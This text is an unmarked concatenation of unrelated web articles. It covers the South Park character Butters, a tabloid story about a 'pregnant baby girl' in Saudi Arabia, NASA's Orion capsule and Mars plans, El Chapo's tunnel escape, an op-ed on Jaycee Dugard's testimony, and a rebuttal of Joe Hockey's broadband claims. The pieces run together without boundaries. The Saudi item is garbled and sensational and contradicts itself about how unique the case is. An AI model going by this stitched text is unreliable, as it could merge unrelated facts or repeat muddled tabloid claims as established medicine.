The character is loosely based on South Park co-producer Eric Stough , [ 12 ] whom Stone and Trey Parker regard as a `` goody-goody '' because of his reluctance to offend . The inspiration behind the major development of Butters ' was , in the words of Parker and Stone , the geeky behavior that Stough irritated the aforementioned creators with during their production of the 1999 South Park TV-to-Film adaptation South Park : Bigger , Longer & Uncut in the studio office of Paramount Pictures . Parker and Stone then decided to parody Stough 's antics in the series by transferring it to the character of Butters and proceeding to write the episode `` Two Guys Naked in a Hot Tub '' , which aired three weeks after Bigger , Longer & Uncut was released . [ 13 ] The nickname `` Butters '' evolved from Parker and Stone calling Stough `` little buddy '' for about three years . [ 15 ] Prior to making his first major appearance in the season 3 episode `` Two Guys Naked in a Hot Tub '' , crew members referred to the character as `` Puff Puff '' and `` Swanson '' , the latter name which he was identified as in the season 2 episode `` Conjoined Fetus Lady '' , and would continue to be addressed by the two names in storyboards and scripts until it was finalized as `` Butters '' in the aforementioned `` Two Guys Naked in a Hot Tub '' . [ 16 ] Butters gradually became one of Parker and Stone 's favorite characters , and for the show 's season five finale they created the episode `` Butters ' Very Own Episode '' , which revolves entirely around Butters and his parents . The intention was to give the character a proper introduction to the South Park audience and prepare them for the larger role he would come to play in further seasons . Butters eventually took part in more and more scenes in which he is paired with Cartman , and Parker declares that the scenes involving the two together are his favorite of the series . [ 17 ] Butters had very little dialogue in the 1999 film South Park : Bigger , Longer , and Uncut , receiving only one line total , though he does utter some grunts and other sounds during some scenes . In a 2009 audio commentary for the Blu-ray edition of the film , Parker and Stone expressed shock at how little the character was used , and agreed that any South Park movie made today would demand he play a role in the plot . [ citation needed ]
Personality and traits
Though using profanity on occasion , Butters does not indulge in foul-mouthed language as often as the other children on the show , instead preferring to use minced oaths ; `` oh hamburgers '' is one he uses frequently , as well as `` gee whiz '' mostly in earlier seasons . Butters speak with a mild stutter and tends to fidget with his hands . [ 18 ] The other characters perceive him as `` nerdy '' , [ 19 ] and he obliviously maintains a wholesome attitude and mild disposition despite the tragedy and abuse that he frequently encounters . [ 18 ] [ 20 ] His happy-go-lucky persona has been described as resembling that of a typical 1950s sitcom child character , [ 2 ] and is usually presented in stark contrast to the harsh treatment he receives at the hands of his friends and strict parents , including his mother 's deranged attempt to murder him after discovering his father 's bisexuality , [ 18 ] as well as when his grandmother happens to be in town and constantly bullies him during her stay . Stone describes him as embodying `` permanent innocence '' . [ 2 ] Butters , however , sees himself as a problem child because his parents tell him so and often expresses remorse at being `` out-of-control '' . Exceptions to this include the episode `` The Ungroundable '' , in which Butters make his parents worry about their ability to ground him when he refuses to be punished . This rebellious behavior begins after he joins the vampire kids at his school , but ends when he helps the Goth kids burn down a Hot Topic store . [ 21 ] He is also known for being gullible , quickly believing anything told him by others and tending to do whatever he is told to do with little protest , no matter how ridiculous these things seem to be . As such , he is always made an unknowing accomplice in Cartman 's various devious schemes . There are cases , however , where Butters have shown a darker side , such as in episodes like `` The Tale of Scrotie McBoogerballs '' and `` Butterballs '' ; in the latter of which he viciously assaulted Dr. Oz and verbally castigated his abusive grandmother .
Reception
In October 2009 , Ramsey Isler of IGN released a list consisting of his favorite moments revolving around the character . [ 22 ]
In other media
Butters appear as a nameless background character in the 1999 film South Park : Bigger , Longer & Uncut . [ citation needed ]
Butters play a major role in the three-episode `` Imaginationland '' story arc , which was reissued straight-to-DVD as a full-length feature in 2008 . [ 23 ] [ 24 ] Butters is the main playable character in South Park Imaginationland , a mobile game for the iPhone loosely based on the show 's Imaginationland trilogy of episodes . [ 25 ] In the video game South Park Let 's Go Tower Defense Play ! , Butters can be selected as a playable character used to establish a tower defense against the game 's antagonists . [ 26 ]
He also appears in a major role as a companion fighter in the video game South Park : The Stick of Truth , where he plays as a paladin , where his abilities include healing , holy damage , and summoning Professor Chaos who can inflict a variety of status-affecting attacks on enemies or shielding the players . In the superhero-themed sequel South Park : The Fractured but Whole , he appears as Professor Chaos and is an antagonist .
A DVD box set of 13 Butters-centric episodes , A Little Box of Butters , was released in September 2010 . [ 27 ]
A pinball machine revolved around the character entitled `` Butters Very Own Pinball '' ( named after the season five finale `` Butters ' Very Own Episode '' ) is playable on the mobile app video game South Park Pinball . [ 28 ]
References
Bibliography
Arp , Robert ( Editor ) ; Yu , Catherine ( 2006 ) . South Park and Philosophy : You Know , I Learned Something Today . Blackwell Publishing ( The Blackwell Philosophy & Pop Culture Series ) . ISBN 978-1-4051-6160-2 .
Pregnant baby girl born in Saudi Arabia
An outstanding incident took place in the medical practice of Saudi doctors . A year-old girl turned out to be pregnant . Doctors said that it was the first incident in the history of modern medicine . Arab media outlets discuss whether the removal of the fetus from the baby girl is going to be considered a murder .
Pregnant baby girl born in Saudi Arabia
It turned out that the mother of the pregnant baby originally had two embryos during her pregnancy . One of the embryos began to develop in the uterus of the other child . In spite of the fact that doctors describe the incident as unique , there can be other similar examples found in history .
A 36-year-old farmer had the embryo of his twin brother removed in the town of Nagpur , India , in 2006 . The man asked for medical help only after his swollen belly hampered his breathing .
Doctors were certain that the man had a gigantic tumor in his belly . However , they found fragments of human genitalia , hairs , limbs and jaws in the patient and finally removed a weird underdeveloped creature having legs and arms with long nails .
In 2002 , Indian doctors found a fetus in the body of a six-month-old boy . The dead fetus , which surgeons removed from the boy , weighed one kilo , whereas the boy himself weighed 6.5 kilos .
The anomalous phenomenon is known as fetus in fetu . Such incidents are extremely rare : an embryo inside an embryo may appear once in 500,000 pregnancies . The phenomenon always occurs at an early stage of pregnancy . As a rule , the fetuses die in mother 's womb .
It may also happen that a child with a fetus inside survives the entire pregnancy . In this case the embryo continues to live inside its owner 's body like a trapped parasite .
A fetus in fetu can be considered alive , but only in the sense that its component tissues have not yet died or been eliminated . Thus , the life of a fetus in fetu is inherently limited to that of an invasive tumor . In principle , its cells must have some degree of normal metabolic activity to have remained viable . However , without the gestational conditions attainable ( so far ) only in utero with the amnion and placenta , a fetus in fetu can develop into , at best , an especially well-differentiated teratoma ; or , at worst , a high-grade metastatic teratocarcinoma . In terms of physical maturation , its organs have a working blood supply from the host , but all cases of fetus in fetu present critical defects , such as no functional brain , heart , lungs , gastrointestinal tract , or urinary tract . Accordingly , while a fetus in fetu can share select morphological features with a normal fetus , it has no prospect of any life outside of the host twin . Moreover , it poses clear threats to the life of the host twin on whom its own life depends .
Also read : Doctors remove parasite child
Taking man to Mars : Nasa reveals the technology behind its Orion capsule and the preparation for its first journey
Orion could take explorers further into space than anyone has ever gone
Will be blasted out of Earth 's atmosphere using the Space Launch System
In September , Orion 's heat shield will be tested in space for the first time
Orion will be launched for a second time in 2017 to the moon and back
This will be first time SLS , most powerful rocket ever created , are tested
Astronauts will get their chance turn to ride the Orion/SLS combination in 2021 on a lunar orbit . After that , destinations are still being debated
For the first time in a generation , Nasa is building a new astronaut-carrying spacecraft .
Called Orion , this capsule is designed to take explorers further into space than we 've ever gone before . Eventually , journeys to Mars itself are being imagined .
The challenge of a journey to Mars must never be underestimated . It is unlike anything the world 's space agencies have tried before – it makes the Apollo Moon landings of the 1960s and '70s look like child 's play .
'Mission to Mars ' appears in issue five of Science Uncovered , on sale now
Called Orion , this capsule is designed to take explorers further into space than we 've ever gone before . Eventually , journeys to Mars itself are being imagined
Mission to Mars appears in issue five of Science Uncovered , pictured , on sale now
Instead of a few weeks in space , a voyage to the red planet and back would take a few years , and this dramatically increases the difficulty .
There are no shortcuts home if something goes wrong . Malfunctions will have to be fixed on the fly – and that includes human malfunctions such as injury or illness .
Appendicitis en route could be a death sentence . Then there are the psychological stresses of living and working in a confined space , isolated from one 's home planet for years .
Nevertheless , Nasa and other space agencies around the world are positioning themselves to take this leap .
The most visible element of this effort is Nasa 's Orion capsule and the Space Launch System ( SLS ) , a grand-sounding name for the most powerful rocket ever developed .
Orion is currently being bolted together and later this year , in September , it will be put through its paces in space for the first time .
'Orion , along with SLS , is the future of human space exploration , ' says Brandi Dean , Nasa 's spokesperson for Orion . 'It 's the vehicle we are building to allow us to send humans farther than we 've ever been able to go before . '
This artist rendering shows a wide-angle view of the liftoff of the crew vehicle configuration SLS from the launchpad . The first flight test of Nasa 's new rocket is scheduled for 2017
THE MARS-BOUND CONTENDERS FOR A MISSION TO THE RED PLANET
Inspiration Mars Foundation
SPACECRAFT : Derived from SpaceX Dragon Capsule
LAUNCH TARGET : 2018
OBJECTIVES : To send a married couple on a Mars fly-by and then return them to Earth
DURATION : 501 days
PROGRESS : The foundation plans to issue a call for crew sometime this year . Its fast timescale has drawn some criticism and in November 2013 , the company issued a report stating it would need Nasa 's Space Launch System . However , that will not be ready by 2018 . The company has identified a ‘ plan B ' launch in 2021 .
Mars One
SPACECRAFT : Mars Transit Vehicle
LAUNCH TARGET : 2024
OBJECTIVE : Establishing
a permanent human colony on Mars
DURATION : Indefinite – the astronauts can not return
PROGRESS : Mars One continues to stir controversy because it offers a one-way 'emigration to Mars ' , as the company calls it . There were 202,000 applications , of which the company has chosen 1,058 for further evaluation over the next 12 months . The first of over
half a dozen unmanned missions is set for 2018 , although it is unclear whether the company has raised enough money yet . China
SPACECRAFT : Unknown
LAUNCH TARGET : 2040-60
OBJECTIVE : A crewed landing on Mars
DURATION : Unknown
PROGRESS : China is the only space-faring nation that is not part of the International Mars Exploration Working Group – the organisation set up to allow collaboration on a Mars mission . It is charting its own course and making extraordinary achievements in comparatively short spaces of time . Although it has no fixed plans for sending astronauts to Mars , it has suggested that missions could launch around the middle of this century .
Orion is the first step . It is modelled on the Apollo capsules , and the key component that sets it apart is its heat shield .
To break from Earth orbit requires more speed than simply getting into orbit . On its return , the craft will re-enter our atmosphere with that extra speed , meaning the shield will have a lot of work to do .
The heat tiles of the Space Shuttle will simply not cut it , so Nasa has been developing a new , heavy-duty shield for Orion . The first one was shipped to Kennedy Space Center in December 2013 , where it 's currently being attached to Orion .
It is a five-metre-wide structure consisting of a titanium skeleton and carbon fibre skin that support a honeycomb of 320,000 cells . Each one of these was filled by hand with a special material called Avcoat . This proved to be the most effective of the samples that Nasa tested .
The main engines of the SLS are those used by the Space Shuttle . There will be four of them and they will be fed liquid hydrogen and liquid oxygen to provide more than 3.8 million kg of thrust at lift-off
Avcoat will flake away during the fiery re-entry , carrying away heat energy and slowing down the spacecraft . Each cell has been X-rayed to check it for perfection .
The titanium skeleton will then provide the strength to withstand the final splashdown in the Pacific Ocean .
The shield will be tried out in this September 's test , when Orion will be lofted into space atop a Delta IV Heavy Lift rocket and sent on a couple of high elliptical orbits .
This will ensure that the capsule hits the atmosphere faster than the Space Shuttle , providing a real test for its shield .
HOW MARS COULD TEACH US ABOUT HOW LIFE STARTED ON EARTH
There are plenty of experiments to be done on Mars . For all the craft that have landed there , they have only just scratched the surface . Nothing will compare to sending humans . ' I think the scientific returns would be enormous frankly , ' says Professor Ian Crawford from Birkbeck College , University of London .
'Astronauts are more flexible than robots . They can traverse larger distances and bring back more samples . ' Although the exploration of Mars is important in its own right , it may also tell us about Earth . The origin of life on Earth is the ultimate mystery . No one knows the conditions in which our world went from being habitable to being inhabited . There is no laboratory experiment yet that has taken a flask of chemicals , combined them in some way , and produced life . Unhelpfully , most of the ancient rocks on Earth that were around when life was forming have been destroyed because of our planet 's restlessly shifting surface . The plate tectonics that drive earthquakes and volcanoes recycle the oldest rocks , erasing the fossil and chemical record of those primordial days .
Mars is different . Being smaller than Earth , it does not generate enough internal heat to drive a plate tectonics system . So the ancient rocks must still survive , and in them may be traces of life that once began to develop on Mars .
We have n't yet got any rock samples back to begin analysis . There are some designs for a robotic sample-return mission that will gather a few hundred grammes , but according to Crawford , only human missions can bring back really useful amounts .
This is because the equipment to keep humans alive is so heavy that by the time you have developed a spacecraft capable of carrying it , a few hundred kilogrammes of rocks would be nothing .
The Orion spacecraft and the Space Launch System ( SLS ) , NASA¿s next crew capsule and heavy-lift rocket , will provide an entirely new capability for human exploration . Pictured is water impact testing on the Orion spacecraft
Assuming all of that goes well , Orion will be launched for a second time in 2017 . This flight will be to the moon and back , but there will not be a crew onboard and no landing will be attempted .
'We do n't generally put people on the first launch of a new rocket , ' says Mr Dean .
This flight to the moon will also be significant for other reasons . Namely , it will be the first flight of the Space Launch System . 'SLS is a game-changer , ' says Kimberly Henry of Nasa 's Marshall Space
Flight Center , where SLS is being developed . 'It will be the most powerful rocket [ ever ] , with the most capacity that we have ever had to take humans and equipment further into our Solar System . '
Astronauts will get their chance turn to ride the Orion/SLS combination in 2021 . This too will be to lunar orbit . After that , destinations are still being debated .
A barge arrives at the U.S. Army Outpost wharf at Port Canaveral in Florida , carrying two of the three United Launch Alliance Delta IV heavy boosters for Nasa 's Exploration Flight Test-1 ( EFT-1 ) with the Orion spacecraft
Orion itself is not capable of going to Mars alone . 'It 's designed for missions of up to 21 days , ' says Mr Dean .
This means that a return to the surface of the Moon is possible with the development of a lunar lander . But to go further – to rendezvous with an asteroid or to visit Mars – would require a transfer vehicle that the astronauts can live in for months at a time .
Going to the red planet would essentially require a small space station in order to hold enough supplies for the journey .
There are some designs . The Boeing Corporation , best known as the maker of the jumbo jet , has been outlining possible hardware for Martian missions that uses technology being developed now .
One such concept is the expandable space module being designed by Bigelow Aerospace . This could be launched in a compact form and then inflated with air once in orbit to provide a roomy habitat for astronauts .
In December 2012 , Nasa signed a $ 17.8 million ( £10.7 million ) contract with the company to produce a test module .
Known as the Bigelow Expandable Activity Module ( Beam ) , it is scheduled for a launch in 2015 . It will be connected to the International Space Station and monitored for atmospheric leakage , radiation resistance and temperature fluctuations for two years .
Q & A WITH PLANETARY SCIENCE EXPERT PROFESSOR IAN CRAWFORD
How important is Orion ?
It is clearly important because it is the only thing we have on the horizon for taking people out of low Earth orbit . Until we regain the means of doing that , we wo n't be going anywhere in the Solar System . So for the first step , I think Orion is very important .
Can Orion be used to take humans to Mars ?
The Orion vehicle itself is designed to provide for a crew for a small number of weeks . This is nothing like what you would need to take people to Mars , or even a near-Earth asteroid . It is sufficient to get people to the Moon and back again . So this is a first step , but it is necessary to recognise that to send people to Mars we certainly need more than Orion .
What else would be needed ?
We would need a transfer vehicle that is yet to be developed , with more space and more radiation protection . You need to keep people alive in space for up to a year , rather than a few weeks , for a journey to Mars . So there are many other elements that need to be developed before we have a capability that can truly get to Mars .
What 's the biggest hurdle for sending humans to Mars ?
Ultimately , it 's down to money and resources . But before the money it must come down to political will . That said , there are some non-trivial technical issues that have to be solved in order to get people to Mars . The biggest , I think , is the radiation hazard – especially if there were to be a solar flare . How we protect astronauts from that on a mission is an unresolved problem at the moment .
Radiation is a key threat to astronauts going to Mars . Just as mariners from the past faced unpredictable , life-threatening storms on Earth 's oceans , so too will the astronauts face dangerous ‘ space weather ' . The Sun gives out a constant ‘ wind ' of radiation .
Other radiation comes into the Solar System from beyond . These ‘ cosmic rays ' were monitored on the Curiosity rover during its cruise to Mars in 2012 to get an idea of what astronauts would experience . Unfortunately , the results did not make for happy reading .
Between December 2011 and July 2012 , a Mars-bound astronaut would have clocked up the same radiation dose in a day that the average American receives in a year .
If you exclude medical dosages , it would be 10 times more than the average yearly dose for an American . If this is typical , and there is no reason to assume that it is not , the radiation from a 500-day round trip to Mars would exceed NASA 's current safety guidelines .
A mock-up of Nasa 's Orion spacecraft recently took an east coast journey from the agency 's Kennedy Space Center in Florida to Langley Research Center in Hampton , Virginia
Making matters worse is the fact that gigantic explosions occasionally take place on the sun , which create storms of radiation that are highly dangerous to humans in space .
Having to survive such storms is almost inevitable on a Mars mission , and despite many ideas , there is not yet any technology that has been tested to do this .
And then there is the problem of microgravity . Without the Earth 's pull to work against , our muscles begin to decrease in mass , and other parts of the body deteriorate as well .
Astronauts ' spines lengthen , causing pain and raising the possibility of slipped discs when they return to a gravity environment , as would be the case if they landed on Mars , where gravity is 38 per cent of that on Earth .
The two per cent scale models of the SLS boosters and core stage engines are ignited for a 100 millisecond , hot-fire test . The test was used to validate the design of the models
When European Space Agency ( Esa ) astronaut Andreas Mogensenconducts his mission to the International Space Station in 2015 , he will wear a tight-fitting skinsuit that Esa hopes 0will prevent some of microgravity 's effects on the body .
If this is shown to be effective , it could help astronauts arrive on Mars in better condition so they can begin work straight away without having to go through any rehabilitation .
No one yet knows the name of the person who will be the first to set foot on Mars – but Mr Dean knows this much : 'The people who will go to Mars are certainly alive today . I would not be surprised if astronauts in the corps currently are included on the mission . '
The tunnel stretched a mile long , from the jailhouse shower to an empty building in a cornfield , and was deep enough for drug kingpin Joaquin “ El Chapo ” Guzman to stand upright as he made his escape .
A minor engineering masterpiece , some might say , equipped with ventilation , lighting , oxygen tanks , scaffolding and a motorcycle contraption for removing the tons of dirt being excavated .
Guzman , Mexico 's most powerful drug lord , escaped sometime Saturday night from a maximum-security prison through the clandestine passageway , authorities announced Sunday .
He had often used tunnels , as well as bribes and murder , to stay steps ahead of the law during his last decade on the lam . Yet , after his capture last year , the president of Mexico said losing him again would be “ unpardonable . ”
It is the second time Guzman , head of the Sinaloa cartel , Mexico 's largest and most lucrative trafficker of heroin , cocaine and marijuana , has been able to flee jail . The first time was 2001 , from a different prison , when he famously hid in a laundry cart , and he remained a fugitive — albeit sometimes a public one — until his arrest last year .
Guzman 's escape is a major embarrassment for the administration of President Enrique Peña Nieto , which has prided itself for having taken down a string of top cartel leaders .
Authorities launched a massive manhunt late Saturday after discovering Guzman 's disappearance from the Altiplano prison about 50 miles west of the capital . Soldiers occupied Mexico City 's international airport and roadblocks were set up at numerous spots in the area .
The search extended across several states and beyond Mexico 's borders .
More than 30 prison guards and other employees were detained for questioning .
U.S. officials had sought Guzman 's extradition , in part for precisely the fear that he would take advantage of the weak , corrupt Mexican justice system to continue his trafficking business and even , eventually , break out . Several U.S. federal indictments have been filed against Guzman , including one in California , but Mexico had said it wanted to prosecute him first .
The tunnel that Guzman used to flee was sophisticated . It was nearly a mile long and deep enough for him to stand , authorities said . Its opening was a rectangular hole in the former prisoner 's shower , measuring 20 inches by 20 inches . It then descended 30 feet , ran its length under largely unpopulated land and ended in a somewhat isolated house under construction in the nondescript Santa Juanita neighborhood , surrounded by empty fields .
Join the conversation on Facebook > >
Authorities , attempting to explain how it was possible for such an elaborate construction to have taken place unnoticed , said Guzman 's shower was the only place in his cell where there were no security cameras .
Monte Alejandro Rubido , Mexico 's security commissioner , said Guzman was last seen about 8 p.m. when he reported for medicine . Then he headed off to the shower . After a time , when he never reappeared , the alert was sounded and he could n't be found .
“ This is something that had been cooking for months , ” security expert and former government intelligence officer Alejandro Hope said in a television interview . “ It shows the weakness of the entire chain of [ Mexico 's ] judicial system . ”
During his previous stint as a fugitive , Guzman became one of the most powerful drug lords in the world . Forbes magazine once estimated his fortune at more than $ 1 billion , and he was the stuff of legends .
The Sinaloa cartel expanded its reach throughout much of the U.S. , Europe and even Australia . More businesslike than some of the more vicious Mexican cartels , it nevertheless has been deeply involved in the violence that has claimed tens of thousands of lives here in recent years .
Guzman eluded capture easily . He had local officials and even part of the security establishment on his payroll and was repeatedly alerted when operations were launched to find him . He was finally tracked down to an apartment complex facing the ocean in the Sinaloan resort city of Mazatlan . He was there with his latest wife , a former beauty queen , and twin daughters , who were born near Los Angeles in 2011 .
When he was captured on Feb. 22 , 2014 , he put up no resistance , although — apparently aware that authorities were on his trail — he had fled a few days earlier from the state 's capital , Culiacan , through a network of tunnels and sewers . Then , as now , his skill at tunneling came in handy .
The U.S. had offered more than $ 5 million for his capture .
His nickname , El Chapo , means “ shorty , ” and comes from his relative small stature ; he stands a little under 5 feet 5 . He is thought to be 56 , although there are discrepancies on his age .
Peña Nieto and his top Cabinet members were in France on an official visit when news came of Guzman 's latest escape . Interior Minister Miguel Angel Osorio Chong rushed back to Mexico .
In an interview with L.A.-based Mexican reporter Leon Krauze last year , shortly after Guzman 's capture , Peña Nieto vehemently rejected the idea that he could escape again .
“ It would be more than regrettable , it would be unpardonable that the state and the government not take adequate measures to ensure that what happened years ago not be repeated , ” the president said .
From Paris on Sunday , the president said only that the escape was unfortunate and a challenge to the Mexican state .
Graco Ramirez , governor of the nearby state of Morelos , one of many on “ red alert ” after the escape , said the turn of events was “ unjustifiable . ”
“ Mexico 's penal system is in profound crisis , ” Ramirez said .
The U.S. government also weighed in .
“ We share the government of Mexico 's concern regarding the escape of Joaquin Guzman Loera ‘ Chapo ' from a Mexican prison , ” U.S. Atty . Gen. Loretta Lynch said in a statement , noting the numerous drug-trafficking and organized-crime charges against him in the United States . “ The U.S. government stands ready to work with our Mexican partners to provide any assistance that may help support his swift recapture . ”
For many here , it strained credulity that such a well-equipped tunnel could be constructed without anyone in authority noticing .
“ It was just a matter of time that this señor make a mockery of the government 's holding him , ” said Arturo Martinez Perez , a 52-year-old schoolteacher mulling over the news . “ They never realized he was building a tunnel ? Please . They really want us to believe that ? ”
“ It 's admirable , ” said Fabian Lopez , a 41-year-old merchant . “ Shows you who really runs this country . ”
Dentist Ernesto Figueroa , 47 , suggested with tongue in cheek that Guzman be hired to handle some of Mexico 's more troubled construction projects because he 'd do a better job .
We slow down to peer at the carnage from the traffic accident , watch movies in which men with chainsaws stalk co-eds and follow the news of Jaycee Lee Dugard 's 20-year ordeal because we want to know the outer reaches of our worst fears .
We also watch and read and listen to these horrors because the very worst in us - along with the very best in us - always has something profound to teach us .
As the Los Angeles Times reported this morning in Jaycee Lee Dugard : Dugard 's Words Tell Vividly of Her Long Ordeal , a California trial court has unsealed eighty percent of the transcript of the grand jury hearing that initiated proceedings resulting in probable life sentences for Dugard 's captors , molesters and rapists - the Garridos - this past Thursday .
What most struck me about Dugard 's grand jury testimony were not the details of her abduction , rape , impregnation or imprisonment , but the admixture of fear and self-sacrifice that kept her prisoner - a mixture that continues to keep too many women silent and compliant at home and in the workplace .
Why She Did n't Escape Earlier
The question on everyone 's mind two years ago when Dugard escaped with her two daughters after twenty years of imprisonment was `` why had n't she done so earlier . ''
The grand jury transcript contains the answers . Although Dugard was tasered only once - when abducted at eleven years of age - Phillip Garrido kept the taser gun visible and at the ready - a constant implied threat . He would also expressly threaten Dugard with its use whenever she `` stepped out of line . ''
Later , however , after giving birth to two children fathered by Garrido , Dugard stayed more out of her fear of leaving than the horror of staying . She told the grand jury that she `` did n't know where to go , what [ she ] would do for money . '' She `` did n't have anything '' and she `` could n't leave . '' She `` had the girls . ''
How many women do you know who , absent the taser gun , feel similarly imprisoned by circumstance ? For anyone who has ever worked at a battered woman 's shelter as I have , the Dugard story is just the extreme and horrifying edge of the stories told by hundreds of thousands of women to rape counselors and battered women shelter employees around the country every day .
For that , we women with satisfying occupations , disposable income and freedom of movement , should be compelled by Dugard 's story to take a turn at such a shelter . Get the training . Be of service .
She Thought She Was Helping
The good thing about our inculturation as women is also our greatest weakness . We are trained - and perhaps have some innate tendency to - sacrifice our own self-interest for that of others . That training or trait creates heroes , like Miep Gies who hid Anne Frank 's family from the Nazis for two years at the risk of her own life .
The bad thing about our inculturation is that we sacrifice too much . Much too much . And far too often .
Dugard 's most shocking testimony was not the bizarre and perverted horror she lived , but one of her reasons for staying . She felt , she said , that she was
'helping somebody , even though it was in a really sick , perverted way . ' Garrido told her he had a 'sex problem and that , you know , he got me so he would n't have to do this to anybody else . So I was helping him . '
This statement - I was helping him - in the context of Dugard 's victimization is so disturbing that we want to turn away from her helplessness even more than we do from her heartlessly brutal treatment .
But we should not , we can not , do that .
If We Are Silent , We are Complicit
I was helping him should ring familiar to every woman who is `` helping '' others - often men - to `` save '' them from their addictions , their defalcations , their criminal conduct , their persistent sexual harassment of women or their criminal sexual conduct .
You need examples ?
The 2009 $ 5.79 million dollar verdict for sexual harrassment , negligent supervision , and retaliation against a Hyundai supervisor who propositioned the plaintiff for oral sex , sex , and threatened to blow her husband 's head off . When Plaintiff complained to another supervisor , s/he `` laughed it off and said that the accused will tell you `` stuff you do n't want to hear '' .
Supervisor at UBS Financial Services in 2011 - $ 10.6 million sexual harassment verdict for supervisor 's repeated comments about the plaintiff 's breast size , invitations to his office to view sexually offensive e-mails , repeated statements about the size of his genitals and repeated questions about her sexual fantasies .
And , of course , the attempted rape charges recently brought against the former International Monetary Fund 's Managing Director , Mr. Strauss-Kahn .
We know this is happening . We go along to get along . We let it slide . We take it in our stride . We forgive . We say `` they 're just being guys '' or `` he 's a womanizer '' or `` you know Arnold , when he wants to he can really charm women . '' And sometimes we even think we 're doing our men a favor .
Baldly stated , men do not engage in this behavior without our complicity .
Do we need the example of 11-year old Jaycee Lee Dugard to finally speak truth to power ?
[ Correction : the length of Dugard 's capitivity was 18 , not 20 years ]
analysis Yesterday Shadow Treasurer Joe Hockey issued an extensive statement attempting to show that comments he had made about 4G mobile broadband having the potential to be “ far superior ” to the National Broadband Network 's fibre had been taken out of context . Unfortunately , he only succeeded in digging himself a bigger hole .
Those who have not been following the debate this week can find Delimiter 's original article quoting Hockey 's comments in Tasmania here , and Hockey 's extensive response in full here . In essence , in a radio interview in Tasmania last week , Hockey had argued that 4G had the potential to be “ far superior ” to the NBN , along with other claims such as the idea that it could cost Australians up to $ 1,000 to be connected to the NBN , and that some Tasmanians receiving replacement NBN hardware could be left behind in the rollout .
At the core of Hockey 's new NBN statement yesterday was the assertion that he had been taken out of context .
He argued that Delimiter 's original article reporting his comments in Tasmania had made a “ deliberate distortion ” of the word ‘ capacity ' , falsely associating it with the technical term of bandwidth rather than with other aspects of a broadband connection , such as value for money , convenience , nearness of availability/deployment and “ numerous other attributes ” . In this sense , Hockey argued , mobile broadband offered mobility , portability and convenience for end users , facets which would , he implied not be available through fixed-line broadband connections such as fibre . He suggested that it was these aspects of mobile broadband which was behind the current huge take-up figures of this style of broadband , compared with the flat growth in subscriber numbers being experienced by fixed broadband .
Hockey is correct in that mobile broadband does offer a benefit to Australians that fixed broadband does not ; mobility . By its very nature , mobile broadband though 3G/4G networks allows users to leave their premises and go wherever they want . Fixed broadband does not offer this feature ; by its very nature , it is fixed . We hold these truths to be self-evident .
However , with respect to other aspects of his argument , Hockey is unfortunately incorrect .
Firstly , is a well-known fact that mobile broadband offers much worse value for money than fixed broadband . A simple comparison of Telstra 's mobile broadband plans shows that they top out at 15GB of download quota for $ 79.95 a month . In comparison , Telstra offers 500GB ADSL/HFC cable plans for $ 89.95 per month ; a download quota 33 times the size , for only a small amount more . And Telstra 's fixed broadband plans are far from the cheapest in the market ; Dodo , for example , currently offers an ADSL broadband plan with unlimited downloads , for $ 39.95 a month ; literally half that of Telstra 's top-end mobile broadband plan .
Hockey is correct that mobile broadband options can be more convenient and available to Australian broadband users in 2012 ; there are some places you ca n't get cheaper and more reliable fixed broadband . We refer to these as ‘ blackspots ' , and readers regularly complain about the issue .
However , as the NBN rollout progresses and meets its target of 100 percent penetration of Australian premises across the nation , this will increasingly become less true over the next 7-8 years . With almost ubiquitous fibre to the home broadband around Australia and the gaps plugged by wireless and satellite , it would make very little sense for most users to use mobile broadband when they are close to any residential or business ; given that they can achieve faster speeds , with greater quota included , at a lower cost , by connecting to their nearest NBN connection instead . Why reach for a hammer , when there 's a high-powered drill already plugged in everywhere you go ?
This does not diminish the case for Australians to take up mobile broadband further ; in fact , Australians are indeed currently taking up mobile broadband in record numbers . But , as Telstra chief executive David Thodey and others have repeatedly stated , most who do so are also already buying a fixed broadband connection , and plan to continue to do so . Fixed to mobile substitution is relatively low in Australia ; people want their cake and to eat it too . The big game for telcos like Telstra and Optus is in selling bundles of both . My own household pays for both ADSL2+ fixed broadband at home , and 3G connections for two smartphones and an iPad , and I do not expect this pattern of consumption to change .
As Informa telecoms analyst Tony Brown points out in a detailed analysis of Hockey 's comments this week : “ True , there may currently be a very small number of households that might prefer a mobile to a fixed broadband connection , but are these households really going to be willing to pay the kind of prices for LTE mobile data services that operators are going to be charging in the future , with high prices for very small data caps and hefty additional usage charges ? ” I do n't think so .
Hockey 's other comments are also still inaccurate .
Citing “ hard data ” from the US rollout of fibre by Verizon , Hockey suggested that it could cost up to $ 1,000 for Australians to wire their houses up for the NBN . “ This is verified by industry reports of Telstra 's experience in South Brisbane , which suggest it is taking two technicians half a day to finalise the cutover from copper to fibre , ” he said .
Now , this claim with respect to the NBN is a long-running one . It was first raised by The Australian newspaper during the 2010 Federal Election campaign and hinges on the idea that NBN Co is only providing a connection to buildings , while connections ( typically Ethernet cable , but usually also an internal Wi-Fi connection ) inside those buildings will need to be rolled out at a cost to the building owner or resident . To be honest , as someone who has had Ethernet cable running down their hall for a decade at a cost of $ 30 , I ca n't believe that this is still a debate , but let 's go back over it again anyway .
The rollout of Ethernet cable inside buildings has absolutely nothing to do with the NBN . In fact , many Australian premises already have internal Ethernet cable wired throughout their premises simply to provide internal exit points for the current generation of ADSL and HFC cable broadband connections — and even 3G/4G mobile broadband connections and fibre where it already exists or even the previous generation of expensive corporate solutions such as Frame Relay .
When we talk about connecting to the NBN , what this really means for the overwhelming majority of Australians is either connecting their existing router to the internal Ethernet port found on NBN Co 's network termination devices inside a premise , or buying a new router that will be able to connect to it , as many existing consumer routers ( particularly ADSL routers ) wo n't have the correct routing functionality or ports . This will come at a cost of between $ 100 and $ 300 , depending on how high-end you want to go . For most people , their internal wiring wo n't change at all ; only their router will change , if that .
If there is a need or a desire to run new internal Ethernet cables within a premise for the NBN , this can be done by running a few Ethernet cables down the hall to rooms where the cables are needed ( as many Australians do right now ) at a cost of around $ 30 , or by wiring up rooms by running cables through the walls , typically with the help of an electrical contractor , at a cost of a few hundred dollars .
If you had a large house , and were determined to get Ethernet cable termination points in every room of the house and run through every wall , this cost could conceivably be more . But in that case , would you really be complaining that this cost should be subsidised by the government ? I do n't think so . Like the rollout of electrical cables and home plumbing , the deployment of internal Ethernet is a matter for the building owner , not an external provider like NBN Co .
